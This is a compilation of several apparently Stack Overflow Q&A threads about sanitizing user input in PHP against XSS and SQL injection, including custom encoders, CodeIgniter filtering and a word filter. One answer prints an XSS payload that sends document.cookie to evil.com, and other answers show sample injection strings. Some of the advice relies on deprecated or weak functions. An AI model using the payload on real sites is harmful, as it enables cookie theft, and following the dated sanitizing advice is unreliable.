Possible duplicate: PHP: the ultimate clean/secure function
I revised my site's security filters today. I used to filter input and do nothing with the output.
Here it is:
All user inputted variables go through these 2 functions depending on the type:
PS: Since I didn't start coding from scratch, I did it for all variables, including the ones that aren't used in queries. I understand that this is a performance killer and will be undoing that. Better safe than sorry, right?
// numbers (I expect very large numbers)
function intfix($i)
{
    $i = preg_replace('/[^\d]/', '', $i);
    if (!strlen($i))
        $i = 0;
    return $i;
}
// escape non-numbers
function textfix($value) {
    $value = mysql_real_escape_string($value);
    return $value;
}
XSS preventing:
Input - filters user submitted text, like posts and messages. As you see it's currently empty. Not sure if strip_tags is needed.
Output - on all html outputs
function input($input){
    //$input = strip_tags($input, "");
    return $input;
}
function output($bbcode){
    $bbcode = textWrap($bbcode); // textwrap breaks long words
    $bbcode = htmlentities($bbcode,ENT_QUOTES,"UTF-8");
    $bbcode = str_replace("\n", "<br />", $bbcode);
    // then some bbcode (removed) and the img tag
    $urlmatch = "([a-zA-Z]+[:\/\/]+[A-Za-z0-9\-_]+\\.+[A-Za-z0-9\.\/%&=\?\-_]+)";
    $match["img"] = "/\[img\]".$urlmatch."\[\/img\]/is";
    $replace["img"] = "<center><img src=\"$1\" class=\"max\" /></center>";
    $bbcode = preg_replace($match, $replace, $bbcode); // apply the tag patterns
    return $bbcode;
}
I included the img tag because it could be vulnerable to XSS...
What do you think? Anything obviously wrong? Good enough?
Looks OK, but you could easily make one function for both text and ints that first checks the type and then acts on it.
The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carets, quotes, etc. in their inputs (comments, usernames and so on). Since HTML renders codes such as &#40; into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my MySQL database. I have the new mysqli class for that. Adding this sanitization on top of mysqli's separation of input and query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
//explode the string
//do a replacement for each character separately. Only do one replacement.
//dont do it with preg_replace because that function searches through a string in multiple passes
//and replaces already-replaced characters, resulting in horrific mishmash.
//put it back together with + signs iterating through array variables
$patterns = array();
$patterns[0] = "'";
$patterns[1] = '"';
$patterns[2] = '!';
$patterns[3] = '\\';
$patterns[4] = '#';
$patterns[5] = '%';
$patterns[6] = '&';
$patterns[7] = '$';
$patterns[8] = '(';
$patterns[9] = ')';
$patterns[10] = '/';
$patterns[11] = ':';
$patterns[12] = ';';
$patterns[13] = '|';
$patterns[14] = '<';
$patterns[15] = '>';
$patterns[16] = '{';
$patterns[17] = '}';
$replacements = array();
$replacements[0] = '&#39;';
$replacements[1] = '&#34;';
$replacements[2] = '&#33;';
$replacements[3] = '&#92;';
$replacements[4] = '&#35;';
$replacements[5] = '&#37;';
$replacements[6] = '&#38;';
$replacements[7] = '&#36;';
$replacements[8] = '&#40;';
$replacements[9] = '&#41;';
$replacements[10] = '&#47;';
$replacements[11] = '&#58;';
$replacements[12] = '&#59;';
$replacements[13] = '&#124;';
$replacements[14] = '&#60;';
$replacements[15] = '&#62;';
$replacements[16] = '&#123;';
$replacements[17] = '&#125;';
$split_data = str_split($data);
foreach ($split_data as &$value) {
    // count() instead of a hard-coded 17, so the last pattern ('}') is checked too
    for ($i = 0; $i < count($patterns); $i++) {
        //testing
        //echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
        if ($value === $patterns[$i]) {
            $value = $replacements[$i];
            break; // only one replacement per character
        }
    }
}
unset($value); // break the reference with the last element
$data = implode($split_data);
//a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
//$data = preg_replace($patterns, $replacements, $data);
return $data;
} //---END function definition of santitize_data
Spits out result strings like meep&#39;&#59;&#41; drop table or
alert&#40;eval&#40;&#39;document.body.inne&#39; + &#39;rHTML&#39;&#41;&#41;&#59;
and the user sees these rendered in the browser like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
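The character-by-character loop in the question can also be written as a single call to strtr(). When strtr() is given an array, it scans the string once and does not rescan text it has already substituted, which is the property the poster wanted and did not get from preg_replace with arrays. This is only a minimal sketch, not the poster's code: the function name entity_encode and the shortened character map are illustrative assumptions.

```php
<?php
// Hypothetical helper: single-pass replacement of selected characters
// with numeric HTML entities.
function entity_encode(string $data): string
{
    // Illustrative subset of the characters listed in the question.
    $map = [
        "'" => '&#39;',
        '"' => '&#34;',
        '&' => '&#38;',
        '#' => '&#35;',
        ';' => '&#59;',
        '(' => '&#40;',
        ')' => '&#41;',
        '<' => '&#60;',
        '>' => '&#62;',
    ];
    // With an array argument, strtr() never re-replaces its own output,
    // so the '&', '#' and ';' inside an inserted entity are left alone.
    return strtr($data, $map);
}

echo entity_encode("meep';) drop table"), "\n";
// prints: meep&#39;&#59;&#41; drop table
```

For output into HTML text, the built-in htmlspecialchars() with ENT_QUOTES already covers the characters that matter in that context; a custom map like this mainly adds maintenance work.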
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text you could either allow BBCode to allow users to insert a limited, safe subset of HTML via your own conversion functions or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. See here for current browser support for CSP. Don't be tempted to just use one of these methods - a good security model has layered security so if one control is circumvented, the other can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.
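As a rough illustration of the Content Security Policy layer mentioned above, the sketch below builds a policy string and sends it as a response header from PHP. The helper name build_csp and the particular directives are assumptions chosen for the example; a real site would need a policy tuned to the scripts and resources it actually loads.

```php
<?php
// Hypothetical helper: turn a directive => sources map into a
// Content-Security-Policy header value.
function build_csp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

// Example policy (an assumption): same-origin resources only, no plugins.
$policy = build_csp([
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],
    'object-src'  => ["'none'"],
]);

// Headers must be sent before any output. The guard lets the sketch
// run from the command line as well, where no header is sent.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header('Content-Security-Policy: ' . $policy);
}
```

Because this policy does not include 'unsafe-inline', a supporting browser refuses to run inline script blocks, which is what stops an injected script from executing even if the output filter misses it.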
Possible duplicate: Best way to prevent SQL Injection in PHP
On my site I have some HTML content that users sometimes need to save in the database. What is a safe way to do this? (I don't want to endanger my database, or the users who will later see that code when it is loaded from the database.)
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?
Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user, as if someone has injected unsavory HTML into the markup you're going to display then you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.
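To make the split between storage and display concrete, here is a small sketch: the HTML is stored unchanged through a prepared statement and is escaped only when it is written into a page. It assumes PDO with the SQLite driver and an in-memory database purely so the example is self-contained; the table name posts and the sample string are made up for illustration.

```php
<?php
// In-memory SQLite stands in for the real database (an assumption for the demo).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)');

// User-supplied HTML, including an attempt to break out of the query.
$html = "<p>It's <b>bold</b></p>'); DROP TABLE posts; --";

// The value is bound as a parameter, so it is never parsed as SQL.
$insert = $pdo->prepare('INSERT INTO posts (body) VALUES (:body)');
$insert->execute([':body' => $html]);

// What comes back is exactly what went in.
$stored = $pdo->query('SELECT body FROM posts')->fetchColumn();

// Escape at output time, for the HTML context only.
echo htmlspecialchars($stored, ENT_QUOTES, 'UTF-8'), "\n";
```

Storing the raw value and escaping on output avoids the htmlentities/html_entity_decode round trip from the question, which would hand the original markup back to the browser unescaped.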
You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
function sanitize( $val, $html=0 ) {
if (is_array($val)) {
foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
return $val;
} else {
$val = trim( $val );
if (!$html) {
$val = strip_tags($val);
$pat = array("\r\n", "\n\r", "\n", "\r");
$val = str_replace($pat, '<br>', $val); // newlines to <br>
$pat = array('/^\s+/', '/\s{2,}/', '/\s+$/'); // leading, repeated and trailing whitespace
$rep = array('', ' ', '');
$val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
}
return mysql_real_escape_string($val); // escape stuff
}
}
What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think I would prefer a combination of filter_var and urldecode if you want a simple, pure-PHP solution.
Reason
Imagine an input like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If I use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
If I use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)
If the form uses GET instead of POST, some input can still slip through when it is URL-encoded, which is why the function decodes it first. You still keep a minimal amount of information and make sure the final text is harmless.
There are also plenty of classes online to help with filtering; see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
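For the textarea case from the question, escaping at output time is enough to keep the stored value from closing the element early. The sketch below is a minimal illustration; the helper name e and the field name comment are assumptions. It uses htmlspecialchars() directly rather than the filter_var() approach, partly because FILTER_SANITIZE_STRING is deprecated as of PHP 8.1.

```php
<?php
// Hypothetical helper: escape a stored value for use as HTML text,
// including the contents of a <textarea>.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// The payload from the question, as it might come back from the database.
$stored = "</textarea><script type='text/javascript'> Malicious Code</script><textarea>";

// The browser shows the original text inside the box, but no tag in
// the value can terminate the textarea or start a script element.
echo '<textarea name="comment">', e($stored), '</textarea>', "\n";
```

When the form is submitted again, the browser sends back the decoded text, so the value can be stored as-is and escaped the same way on the next render.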
After getting a dirty spammer on my contact form, I expanded my function that sanitizes textbox user input. It now also covers multi-line textarea input.
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php
How do you remove ALL HTML tags with CodeIgniter? I'm guessing you would have to use the PHP function strip_tags, but I wanted something like the global setting for XSS filtering.
Thanks
If you're referring to using the input methods, Yes, you could technically open up system/libraries/Input.php, head down to this code:
/**
 * Clean Input Data
 *
 * This is a helper function. It escapes data and
 * standardizes newline characters to \n
 *
 * @access private
 * @param string
 * @return string
 */
function _clean_input_data($str)
{
if (is_array($str))
{
$new_array = array();
foreach ($str as $key => $val)
{
$new_array[$this->_clean_input_keys($key)] = $this->_clean_input_data($val);
}
return $new_array;
}
// We strip slashes if magic quotes is on to keep things consistent
if (get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
// Standardize newlines
if (strpos($str, "\r") !== FALSE)
{
$str = str_replace(array("\r\n", "\r"), "\n", $str);
}
return $str;
}
And right after the xss clean, you could put your own filtering function like so:
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
$str = strip_tags($str);
However, this means that every time you update CodeIgniter, you will have to make this change again. Also, since this is applied globally, it won't make sense when the value you're getting back is, for example, numeric. For these reasons, I wouldn't recommend this approach.
As an alternative, you can use the CodeIgniter Form Validation library, which lets you set custom rules for fields, including PHP functions that accept one argument, such as strip_tags:
$this->form_validation->set_rules('usertext', 'User Text', 'required|strip_tags');
I'm not sure what the circumstances are, so I'll let you decide which path to take, but in general I recommend handling data validation on a per case basis, since in a majority of cases the validation on the data is unique.
This is what I use when I want to eliminate XSS, HTML and still preserve the user post content (even malicious code attempts)
private function stripHTMLtags($str)
{
$t = preg_replace('/<[^<|>]+?>/', '', htmlspecialchars_decode($str));
$t = htmlentities($t, ENT_QUOTES, "UTF-8");
return $t;
}
The regex removes everything that looks like an HTML tag, and htmlentities takes care of quotes and other special characters.
Use it in your controller every time you need to REALLY clean things up. Fast and simple.
E.g., this very malicious string with lots of code tags and other markup
Just another post (http://codeigniter.com) blablabla text blabla:</p>1 from users; update users set password = 'password'; select * <div class="codeblock">[aça]<code><span style="color: rgb(221, 0, 0);">'username'</span><span style="color: rgb(0, 119, 0);">); </span><span style="color: rgb(255, 128, 0);">// filtered<br></span><span style="color: rgb(0, 0, 187);">- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password </span></span>
<ok.>
Becomes
Just another post (http://codeigniter.com) blablabla text blabla:1 from users; update users set password = 'password'; select * [aça]'username'); // filtered- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password <ok.>
It still has the code, but that won't do anything to your db.
Use it like
$this->stripHTMLtags($this->input->post('html_text'));
You can put this function inside a library so you don't have to hack CI :)
Does anyone know of any sample PHP (ideally CodeIgniter) code for parsing user-submitted comments, to remove profanity, HTML tags, etc.?
Try strip_tags to get rid of any html submitted. You can use htmlspecialchars to escape the tags if you just want to ensure that no html is displayed in the comments - as per Matchu's example, less unintended effects will happen with it than with strip_tags.
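The difference between the two functions shows up as soon as a comment contains a stray angle bracket. The following sketch uses a made-up comment string; it only illustrates the behaviour described above and is not taken from the linked example.

```php
<?php
// A harmless comment that happens to contain '<' as a comparison.
$comment = 'Is 1<2? <b>yes</b>';

// strip_tags() does not validate HTML, so it treats the lone '<' as the
// start of a tag and can discard more text than intended.
$stripped = strip_tags($comment);

// htmlspecialchars() keeps every character and only makes them inert.
$escaped = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');

echo $stripped, "\n";
echo $escaped, "\n"; // Is 1&lt;2? &lt;b&gt;yes&lt;/b&gt;
```

If comments should never contain markup at all, escaping keeps what the user typed visible while still preventing any of it from being interpreted as HTML.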
For a word filter, depending on how indepth you want to go, there are many examples on the web, from simple to complex. Here's the code from Jake Olefsky's example (the simple one linked previously):
<?php
//This is totally free to use by anyone for any purpose.
// BadWordFilter
// This function does all the work. If $replace is 1 it will replace all bad words
// with the wildcard replacements. If $replace is 0 it will not replace anything.
// In either case, it will return 1 if it found bad words or 0 otherwise.
// Be sure to fill the $bads array with the bad words you want filtered.
function BadWordFilter(&$text, $replace)
{
    //fill this array with the bad words you want to filter and their replacements
    $bads = array (
        array("butt","b***"),
        array("poop","p***"),
        array("crap","c***")
    );
    if($replace==1) { //we are replacing
        $remember = $text;
        for($i=0;$i<sizeof($bads);$i++) { //go through each bad word
            //index 1 holds the replacement; str_ireplace stands in for eregi_replace, which was removed in PHP 7
            $text = str_ireplace($bads[$i][0],$bads[$i][1],$text); //replace it
        }
        if($remember!=$text) return 1; //if there are any changes, return 1
    } else { //we are just checking
        for($i=0;$i<sizeof($bads);$i++) { //go through each bad word
            //stripos stands in for eregi, which was removed in PHP 7
            if(stripos($text,$bads[$i][0])!==false) return 1; //if we find any, return 1
        }
    }
    return 0; //no bad words found
}
//this will replace all bad words with their replacements. $any is 1 if it found any
$any = BadWordFilter($wordsToFilter,1);
//this will not replace any bad words. $any is 1 if it found any
$any = BadWordFilter($wordsToFilter,0);
?>
Many more examples of this can be found easily on the web.